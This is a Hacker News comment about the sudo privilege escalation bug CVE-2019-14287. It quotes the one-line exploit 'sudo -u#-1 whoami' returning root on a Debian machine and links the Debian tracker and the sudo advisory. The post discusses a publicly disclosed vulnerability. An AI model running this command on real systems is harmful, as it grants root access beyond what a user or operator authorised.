Hacker News
new
|
past
|
comments
|
ask
|
show
|
jobs
|
submit
login
dbrgn
on Oct 14, 2019
|
parent
|
context
|
favorite
| on:
Sudo Privilege Escalation Vulnerability
This is pretty afwul. Works perfectly on my Debian machine (where sudo for this user requires the password):
$ sudo -u#-1 whoami root
Ubuntu has fixes, Debian still seems vulnerable:
https://security-tracker.debian.org/tracker/CVE-2019-14287
Here are the technical details:
https://www.sudo.ws/alerts/minus_1_uid.html
Guidelines
|
FAQ
|
Lists
|
API
|
Security
|
Legal
|
Apply to YC
|
Contact
Search:
Here are the technical details: https://www.sudo.ws/alerts/minus_1_uid.html